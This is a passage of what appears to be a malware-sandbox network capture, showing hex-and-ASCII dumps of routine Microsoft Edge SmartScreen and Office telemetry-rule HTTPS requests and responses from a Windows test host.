                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        54192.168.2.549836172.183.192.1094437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:39 UTC698OUTPOST /api/browser/edge/data/settings/3 HTTP/1.1
                                                                                                                                                                                                                                                        Host: data-edge.smartscreen.microsoft.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        Content-Length: 725
                                                                                                                                                                                                                                                        Accept: application/octet-stream;application/x-patch-bsdiff;
                                                                                                                                                                                                                                                        Authorization: SmartScreenHash eyJhdXRoSWQiOiI0MWE0MzhiYy0xMjQ5LTQzZDMtYTI2ZC02OWNkNjJjMDgzMTciLCAia2V5IjoiUG45c1g1R2I3Nk9kVGFVY2hIaXBrdz09IiwgImhhc2giOiJlZjB5VS9OUUdHRT0ifQ==
                                                                                                                                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                        If-None-Match: "2.0-0"
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        2024-11-20 23:49:39 UTC725OUTData Raw: 7b 22 69 64 65 6e 74 69 74 79 22 3a 7b 22 75 73 65 72 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 7d 2c 22 64 65 76 69 63 65 22 3a 7b 22 69 64 22 3a 6e 75 6c 6c 2c 22 63 75 73 74 6f 6d 49 64 22 3a 6e 75 6c 6c 2c 22 6f 6e 6c 69 6e 65 49 64 54 69 63 6b 65 74 22 3a 6e 75 6c 6c 2c 22 66 61 6d 69 6c 79 22 3a 33 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 2c 22 6f 73 56 65 72 73 69 6f 6e 22 3a 22 31 30 2e 30 2e 31 39 30 34 35 2e 32 30 30 36 2e 76 62 5f 72 65 6c 65 61 73 65 22 2c 22 62 72 6f 77 73 65 72 22 3a 7b 22 69 6e 74 65 72 6e 65 74 5f 65 78 70 6c 6f 72 65 72 22 3a 22 39 2e 31 31 2e 31 39 30 34 31 2e 30 22 7d 2c 22 6e 65 74 4a 6f 69 6e 53 74 61 74 75 73 22 3a 32 2c 22 65 6e 74 65 72 70 72 69 73 65 22 3a 7b 7d 2c 22 63 6c 6f 75 64 53 6b
                                                                                                                                                                                                                                                        Data Ascii: {"identity":{"user":{"locale":"en-GB"},"device":{"id":null,"customId":null,"onlineIdTicket":null,"family":3,"locale":"en-GB","osVersion":"10.0.19045.2006.vb_release","browser":{"internet_explorer":"9.11.19041.0"},"netJoinStatus":2,"enterprise":{},"cloudSk
                                                                                                                                                                                                                                                        2024-11-20 23:49:40 UTC302INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:40 GMT
                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                        Content-Length: 130439
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Server: Kestrel
                                                                                                                                                                                                                                                        ETag: "2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1"
                                                                                                                                                                                                                                                        Request-Context: appId=cid-v1:46ea1a4d-29cb-4e7e-a1ff-735721467fe3
                                                                                                                                                                                                                                                        2024-11-20 23:49:40 UTC16082INData Raw: 7b 0d 0a 20 20 22 67 65 6f 69 64 4d 61 70 73 22 3a 20 7b 0d 0a 20 20 20 20 22 61 75 22 3a 20 22 68 74 74 70 73 3a 2f 2f 61 75 73 74 72 61 6c 69 61 2e 73 6d 61 72 74 73 63 72 65 65 6e 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 22 2c 0d 0a 20 20 20 20 22 63 68 22 3a 20 22 68 74 74 70 73 3a 2f 2f 73 77 69 74 7a 65 72 6c 61 6e 64 2e 73 6d 61 72 74 73 63 72 65 65 6e 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 22 2c 0d 0a 20 20 20 20 22 65 75 22 3a 20 22 68 74 74 70 73 3a 2f 2f 65 75 72 6f 70 65 2e 73 6d 61 72 74 73 63 72 65 65 6e 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 22 2c 0d 0a 20 20 20 20 22 66 66 6c 34 22 3a 20 22 68 74 74 70 73 3a 2f 2f 75 6e 69 74 65 64 73 74 61 74 65 73 31 2e 73 73 2e 77 64 2e 6d 69 63 72 6f 73 6f 66 74 2e 75 73 2f 22 2c 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: { "geoidMaps": { "au": "https://australia.smartscreen.microsoft.com/", "ch": "https://switzerland.smartscreen.microsoft.com/", "eu": "https://europe.smartscreen.microsoft.com/", "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",
                                                                                                                                                                                                                                                        2024-11-20 23:49:40 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 30 39 63 34 37 36 32 37 62 63 35 33 33 62 35 39 32 34 61 30 35 35 61 30 34 62 63 34 63 33 33 65 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 39 2e 35 38 33 34 34 30 31 37 37 34 34 37 38 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 65 36 33 34 65 62 32 30 64 62 35 30 38 65 33 61 33 31 62 36 31 34 38 31 61 32 35 31 62 66 39 33 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 30 2e 33 33 37 30 36 38 35 39 32 37 38 32 37 33 35 0d 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: { "key": "09c47627bc533b5924a055a04bc4c33e", "value": 9.58344017744784 }, { "key": "e634eb20db508e3a31b61481a251bf93", "value": -0.337068592782735
                                                                                                                                                                                                                                                        2024-11-20 23:49:40 UTC16384INData Raw: 30 37 37 37 34 37 33 33 30 39 35 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 31 32 62 62 65 66 63 30 35 64 35 31 34 32 65 37 65 62 36 38 36 66 61 64 38 64 65 61 39 32 31 31 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 31 2e 30 35 37 31 37 37 35 33 31 31 38 30 39 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 63 65 35 66 62 38 64 66 31 32 35 61 34 37 32 31 64 31 64 66 33 32 38 62 63 36 66 32 64 64 65 61 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a
                                                                                                                                                                                                                                                        Data Ascii: 07774733095 }, { "key": "12bbefc05d5142e7eb686fad8dea9211", "value": -1.05717753118094 }, { "key": "ce5fb8df125a4721d1df328bc6f2ddea", "value":
                                                                                                                                                                                                                                                        2024-11-20 23:49:40 UTC16384INData Raw: 20 2d 31 2e 39 30 31 33 34 36 37 39 37 33 36 34 32 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 66 32 33 35 64 63 66 36 62 34 32 39 62 61 34 31 36 64 63 65 37 34 64 34 62 36 66 62 63 34 37 62 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 31 2e 32 36 30 31 38 31 31 38 35 36 30 38 38 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 63 38 66 31 37 64 37 34 30 33 61 63 35 66 66 32 38 39 36 61 37 31 33 61 37 31 37 35 65 64 31 39 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61
                                                                                                                                                                                                                                                        Data Ascii: -1.9013467973642 }, { "key": "f235dcf6b429ba416dce74d4b6fbc47b", "value": 1.26018118560884 }, { "key": "c8f17d7403ac5ff2896a713a7175ed19", "va
                                                                                                                                                                                                                                                        2024-11-20 23:49:40 UTC16384INData Raw: 36 62 64 32 65 65 33 36 63 30 33 66 36 66 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 35 2e 38 35 39 38 36 34 33 39 33 34 36 35 37 36 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 65 66 64 32 61 66 36 30 63 38 35 30 31 39 33 31 63 62 39 63 37 33 36 62 35 61 64 37 34 66 36 35 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 33 2e 39 35 36 39 39 35 33 35 33 36 34 30 30 33 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 32 63 38 34 38 35 34 38 64 34 36 30 63
                                                                                                                                                                                                                                                        Data Ascii: 6bd2ee36c03f6f", "value": 5.85986439346576 }, { "key": "efd2af60c8501931cb9c736b5ad74f65", "value": 3.95699535364003 }, { "key": "2c848548d460c
                                                                                                                                                                                                                                                        2024-11-20 23:49:40 UTC16384INData Raw: 20 22 6b 65 79 22 3a 20 22 65 31 36 38 36 30 37 38 64 31 62 36 30 64 33 35 31 64 61 35 61 38 37 35 34 33 61 32 61 36 36 33 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 37 2e 35 30 36 36 35 35 32 34 32 36 32 35 35 31 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 33 61 33 34 31 37 66 35 66 32 30 61 30 33 61 39 38 39 37 33 36 38 39 38 38 37 66 62 37 32 61 32 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 31 2e 37 34 39 32 32 35 31 37 36 34 32 37 39 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: "key": "e1686078d1b60d351da5a87543a2a663", "value": 7.50665524262551 }, { "key": "3a3417f5f20a03a98973689887fb72a2", "value": -1.74922517642794 }, {
                                                                                                                                                                                                                                                        2024-11-20 23:49:40 UTC16384INData Raw: 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 62 30 64 61 32 37 35 35 32 30 39 31 38 65 32 33 64 64 36 31 35 65 32 61 37 34 37 35 32 38 66 31 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 30 2e 39 37 36 31 34 30 37 39 32 39 31 35 33 37 33 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 63 66 61 62 31 62 61 38 63 36 37 63 37 63 38 33 38 64 62 39 38 64 36 36 36 66 30 32 61 31 33 32 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 31 2e 31 31 37 38 37 35 38 36 30 34 35 30 39 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: { "key": "b0da275520918e23dd615e2a747528f1", "value": -0.976140792915373 }, { "key": "cfab1ba8c67c7c838db98d666f02a132", "value": -1.11787586045094 },
                                                                                                                                                                                                                                                        2024-11-20 23:49:40 UTC16053INData Raw: 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 64 65 39 35 62 34 33 62 63 65 65 62 34 62 39 39 38 61 65 64 34 61 65 64 35 63 65 66 31 61 65 37 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 31 2e 30 33 33 31 39 35 35 36 37 30 31 31 37 37 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 61 64 64 65 63 34 32 36 39 33 32 65 37 31 33 32 33 37 30 30 61 66 61 31 39 31 31 66 38 66 31 63 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 30 2e 31 36 30 39 38 34 33 32 38 39 38 35 39 32 34 0d
                                                                                                                                                                                                                                                        Data Ascii: }, { "key": "de95b43bceeb4b998aed4aed5cef1ae7", "value": -1.03319556701177 }, { "key": "addec426932e71323700afa1911f8f1c", "value": 0.160984328985924


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        55192.168.2.54983513.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:40 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:40 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:40 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 420
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                                                                                                        x-ms-request-id: 65766a9d-a01e-0002-6d8c-3a5074000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234940Z-178bfbc474bvjk8shC1NYC83ns00000000kg0000000055sp
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:40 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        56192.168.2.54983713.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:40 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:41 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:41 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 472
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582B9D43097E"
                                                                                                                                                                                                                                                        x-ms-request-id: fdab78a3-101e-005a-1d8c-3a882b000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234941Z-1777c6cb754gc8g6hC1TEB966c0000000a7000000000s9pn
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:41 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        57192.168.2.54984313.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:41 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:41 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:41 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 486
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582B92FCB436"
                                                                                                                                                                                                                                                        x-ms-request-id: bf645307-501e-007b-7599-3b5ba2000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234941Z-r1d97b99577l6wbzhC1TEB3fwn00000009r0000000008w39
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:41 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        58192.168.2.54984013.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:41 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:41 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:41 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 427
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BA909FA21"
                                                                                                                                                                                                                                                        x-ms-request-id: bf14eb60-501e-007b-507b-3b5ba2000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234941Z-1777c6cb754whff4hC1TEBcd6c000000091g000000000g6k
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:41 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        59192.168.2.54984413.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:41 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:41 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:41 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 423
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                                                                                                        x-ms-request-id: 57b2d8b6-201e-0033-2767-3bb167000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234941Z-178bfbc474btvfdfhC1NYCa2en00000000s000000000kgwb
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
